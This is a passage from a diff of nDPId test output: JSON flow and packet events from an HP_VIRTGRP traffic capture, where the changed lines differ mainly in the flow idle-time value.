-00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614877863379,"flow_last_seen":1614877863430,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614877863430,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":40152,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614877863379,"flow_last_seen":1614877863379,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614877863379,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":40152,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1614877863379,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614877863379,"pkt":"eJS0JASgYDjgxTWgCABFAAA8nQJAAD8GeT7AqAJkoCzCQpzYFGd4ZLUSAAAAAKAC\/\/8PXgAAAgQFtAQCCAoAcTP+AAAAAAEDAwg="} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1614877863406,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614877863406,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnnNj+cl67eGS1E2ASchDErAAAAgQFrAAA"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1614877863410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614877863410,"pkt":"eJS0JASgYDjgxTWgCABFAAAonQNAAD8GeVHAqAJkoCzCQpzYFGd4ZLUT\/nJevFAQ\/\/9OcgAA"} 
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614877863379,"flow_last_seen":1614877863430,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614877863430,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":40152,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":76,"source":"hpvirtgrp.pcap","alias":"nDPId-test","packets-captured":76,"packets-processed":75,"total-skipped-flows":0,"total-l4-data-len":2866,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":5,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":34,"global_ts_msec":1614880256676} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614880256676,"flow_last_seen":1614880256676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614880256676,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":35634,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1614880256676,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614880256676,"pkt":"eJS0JASgYDjgxTWgCABFAAA87gNAAD8GKD3AqAJkoCzCQosyFGf2oDFeAAAAAKAC\/\/9JKQAAAgQFtAQCCAoAlBEuAAAAAAEDAwg="} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1614880256703,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614880256703,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnizKJqg+b9qAxX2ASchCfswAAAgQFrAAA"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1614880256708,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614880256708,"pkt":"eJS0JASgYDjgxTWgCABFAAAo7gRAAD8GKFDAqAJkoCzCQosyFGf2oDFfiaoPnFAQ\/\/8peQAA"} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614880256676,"flow_last_seen":1614880256732,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614880256732,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":35634,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614880256676,"flow_last_seen":1614880256676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614880256676,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":35634,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1614880256676,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614880256676,"pkt":"eJS0JASgYDjgxTWgCABFAAA87gNAAD8GKD3AqAJkoCzCQosyFGf2oDFeAAAAAKAC\/\/9JKQAAAgQFtAQCCAoAlBEuAAAAAAEDAwg="} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1614880256703,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614880256703,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnizKJqg+b9qAxX2ASchCfswAAAgQFrAAA"} 
+00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1614880256708,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614880256708,"pkt":"eJS0JASgYDjgxTWgCABFAAAo7gRAAD8GKFDAqAJkoCzCQosyFGf2oDFfiaoPnFAQ\/\/8peQAA"} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614880256676,"flow_last_seen":1614880256732,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614880256732,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":35634,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":91,"source":"hpvirtgrp.pcap","alias":"nDPId-test","packets-captured":91,"packets-processed":90,"total-skipped-flows":0,"total-l4-data-len":3481,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":0,"current-active-flows":3,"total-active-flows":6,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":40,"global_ts_msec":1614892184461} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":91,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614892184461,"flow_last_seen":1614892184461,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614892184461,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":49838,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1614892184461,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614892184461,"pkt":"eJS0JASgYDjgxTWgCABFAAA8o7JAAD8Gco7AqAJkoCzCQsKuFGf4RqT8AAAAAKAC\/\/\/8FAAAAgQFtAQCCAoBLLDpAAAAAAEDAwg="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1614892184487,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614892184487,"pkt":"eJS0JASgYDjgxTWgCABFAAA8o7NAAD8Gco3AqAJkoCzCQsKuFGf4RqT8AAAAAKAC\/\/\/4LwAAAgQFtAQCCAoBLLTOAAAAAAEDAwg="} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1614892184489,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614892184489,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnwq4QVsoE+Eak\/WASchCx3QAAAgQFrAAA"} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":95,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1614892184461,"flow_last_seen":1614892184500,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1614892184500,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":49838,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614876808445,"flow_last_seen":1614876926772,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614892185660,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59920,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} 
-00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614880256676,"flow_last_seen":1614880490568,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":615,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1614892185660,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":35634,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614877863379,"flow_last_seen":1614877864559,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":778,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1614892185660,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":40152,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":91,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614892184461,"flow_last_seen":1614892184461,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614892184461,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":49838,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1614892184461,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614892184461,"pkt":"eJS0JASgYDjgxTWgCABFAAA8o7JAAD8Gco7AqAJkoCzCQsKuFGf4RqT8AAAAAKAC\/\/\/8FAAAAgQFtAQCCAoBLLDpAAAAAAEDAwg="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1614892184487,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614892184487,"pkt":"eJS0JASgYDjgxTWgCABFAAA8o7NAAD8Gco3AqAJkoCzCQsKuFGf4RqT8AAAAAKAC\/\/\/4LwAAAgQFtAQCCAoBLLTOAAAAAAEDAwg="} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1614892184489,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614892184489,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnwq4QVsoE+Eak\/WASchCx3QAAAgQFrAAA"} 
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":95,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1614892184461,"flow_last_seen":1614892184500,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1614892184500,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":49838,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614876808445,"flow_last_seen":1614876926772,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614892185660,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59920,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614880256676,"flow_last_seen":1614880490568,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":615,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1614892185660,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":35634,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614877863379,"flow_last_seen":1614877864559,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":778,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1614892185660,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":40152,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":106,"source":"hpvirtgrp.pcap","alias":"nDPId-test","packets-captured":106,"packets-processed":105,"total-skipped-flows":0,"total-l4-data-len":4061,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":7,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":7,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":49,"global_ts_msec":1614894888601} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":106,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614894888601,"flow_last_seen":1614894888601,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614894888601,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42552,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1614894888601,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614894888601,"pkt":"eJS0JASgYDjgxTWgCABFAAA8czZAAD8GowrAqAJkoCzCQqY4FGfLLz4YAAAAAKAC\/\/+U4AAAAgQFtAQCCAoBVchmAAAAAAEDAwg="} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1614894888628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614894888628,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnpjjVSzZFyy8+GWASchAxGQAAAgQFrAAA"} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1614894888632,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614894888632,"pkt":"eJS0JASgYDjgxTWgCABFAAAoczdAAD8Gox3AqAJkoCzCQqY4FGfLLz4Z1Us2RlAQ\/\/+63gAA"} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614894888601,"flow_last_seen":1614894888640,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614894888640,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42552,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":106,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614894888601,"flow_last_seen":1614894888601,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614894888601,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42552,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1614894888601,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614894888601,"pkt":"eJS0JASgYDjgxTWgCABFAAA8czZAAD8GowrAqAJkoCzCQqY4FGfLLz4YAAAAAKAC\/\/+U4AAAAgQFtAQCCAoBVchmAAAAAAEDAwg="} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1614894888628,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614894888628,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnpjjVSzZFyy8+GWASchAxGQAAAgQFrAAA"} 
+00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1614894888632,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614894888632,"pkt":"eJS0JASgYDjgxTWgCABFAAAoczdAAD8Gox3AqAJkoCzCQqY4FGfLLz4Z1Us2RlAQ\/\/+63gAA"} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614894888601,"flow_last_seen":1614894888640,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614894888640,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42552,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":121,"source":"hpvirtgrp.pcap","alias":"nDPId-test","packets-captured":121,"packets-processed":120,"total-skipped-flows":0,"total-l4-data-len":4583,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":8,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":8,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":55,"global_ts_msec":1614898090218} 
